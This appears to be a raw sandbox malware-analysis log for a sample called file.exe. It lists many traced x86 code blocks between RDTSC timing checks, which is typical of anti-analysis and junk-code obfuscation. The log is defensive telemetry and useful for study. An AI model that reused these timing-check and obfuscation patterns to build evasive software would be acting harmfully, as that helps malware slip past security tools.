Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99FBFD second address: 99FC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC902C412h 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push esi 0x0000000f jmp 00007F7CC902C40Ch 0x00000014 pop esi 0x00000015 mov eax, dword ptr [eax] 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99FC2D second address: 99FC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99FC31 second address: 99FC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F7CC902C40Ch 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9397DD second address: 9397E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9397E4 second address: 9397EE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7CC902C40Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A3936 second address: 9A393A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A393A second address: 9A3952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F7CC902C40Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A3952 second address: 9A3958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A3958 second address: 9A3964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7CC902C406h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A3964 second address: 9A396E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7CC8D8AE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A4261 second address: 9A4266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A4266 second address: 9A426C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A426C second address: 9A4276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7CC902C406h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A4276 second address: 9A4281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A4689 second address: 9A468D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A468D second address: 9A46BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7CC8D8AE37h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F7CC8D8AE2Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A4840 second address: 9A485F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC902C417h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A49AD second address: 9A49D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC8D8AE30h 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jne 00007F7CC8D8AE26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A49D0 second address: 9A49D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC42E second address: 9AC46F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7CC8D8AE43h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7CC8D8AE34h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC46F second address: 9AC47F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC47F second address: 9AC485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC608 second address: 9AC60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC789 second address: 9AC78F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC78F second address: 9AC7B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Bh 0x00000007 jp 00007F7CC902C406h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC7B6 second address: 9AC7BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC7BE second address: 9AC7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC7C2 second address: 9AC7DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE36h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC144 second address: 9AC149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC149 second address: 9AC154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F7CC8D8AE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC154 second address: 9AC15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC15C second address: 9AC18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F7CC8D8AE52h 0x0000000d push ecx 0x0000000e jmp 00007F7CC8D8AE38h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AC18B second address: 9AC18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AD029 second address: 9AD02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AD19A second address: 9AD19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AD19E second address: 9AD1B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE30h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 975462 second address: 97546C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97546C second address: 975470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 975470 second address: 9754A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a xor edx, 2FEC57FFh 0x00000010 lea eax, dword ptr [ebp+124871D1h] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F7CC902C408h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 nop 0x00000031 push ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9754A9 second address: 9754AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9754AD second address: 9754B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9754B1 second address: 9754D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F7CC8D8AE35h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 975615 second address: 975628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7CC902C40Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9762D9 second address: 9762F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7CC8D8AE34h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B11CE second address: 9B11DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7CC902C40Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B1494 second address: 9B149A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B1616 second address: 9B161B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B161B second address: 9B1625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B1625 second address: 9B1636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push esi 0x00000009 jnl 00007F7CC902C406h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B1636 second address: 9B163E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B61BF second address: 9B6200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Bh 0x00000007 jmp 00007F7CC902C414h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F7CC902C40Ah 0x00000013 jmp 00007F7CC902C410h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6200 second address: 9B6206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B68D4 second address: 9B68D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B68D8 second address: 9B68F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7CC8D8AE37h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6A4D second address: 9B6A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6A51 second address: 9B6A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6D3E second address: 9B6D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6D42 second address: 9B6D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6D48 second address: 9B6D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6D50 second address: 9B6D56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6EE5 second address: 9B6F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F7CC902C406h 0x0000000d jmp 00007F7CC902C417h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B721C second address: 9B7222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B5EF8 second address: 9B5F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 jmp 00007F7CC902C40Ah 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BEF0F second address: 9BEF15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BEF15 second address: 9BEF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C417h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F7CC902C412h 0x00000011 jne 00007F7CC902C406h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BEF40 second address: 9BEF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007F7CC8D8AE26h 0x0000000f jmp 00007F7CC8D8AE2Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BEF5F second address: 9BEF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BEF69 second address: 9BEF72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BF0AF second address: 9BF0CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C410h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F7CC902C406h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BF0CB second address: 9BF0E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F7CC8D8AE26h 0x00000010 jno 00007F7CC8D8AE26h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9BF0E1 second address: 9BF0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C1ADC second address: 9C1AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C89A4 second address: 9C89B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C89B6 second address: 9C89D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE31h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F7CC8D8AE26h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C8B46 second address: 9C8B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F7CC902C406h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CA6CA second address: 9CA6CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CDB13 second address: 9CDB32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7CC902C416h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE103 second address: 9CE107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE107 second address: 9CE10F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE268 second address: 9CE27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F7CC8D8AE26h 0x0000000c jmp 00007F7CC8D8AE2Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE27E second address: 9CE282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE282 second address: 9CE288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE288 second address: 9CE28D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D2B1A second address: 9D2B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D2B1E second address: 9D2B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9760D8 second address: 9760FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b jns 00007F7CC8D8AE34h 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F7CC8D8AE26h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9760FA second address: 976149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F7CC902C40Bh 0x0000000c mov ebx, dword ptr [ebp+12487210h] 0x00000012 mov edx, dword ptr [ebp+122D3312h] 0x00000018 add eax, ebx 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F7CC902C408h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 movzx edi, si 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a jo 00007F7CC902C408h 0x00000040 push ebx 0x00000041 pop ebx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976149 second address: 97614F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97614F second address: 976153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976153 second address: 976186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC8D8AE31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F7CC8D8AE39h 0x00000014 jmp 00007F7CC8D8AE33h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3410 second address: 9D3416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3416 second address: 9D341E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D341E second address: 9D3424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D357B second address: 9D357F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F7D second address: 9D3F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F83 second address: 9D3F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F8D second address: 9D3F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3F95 second address: 9D3FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
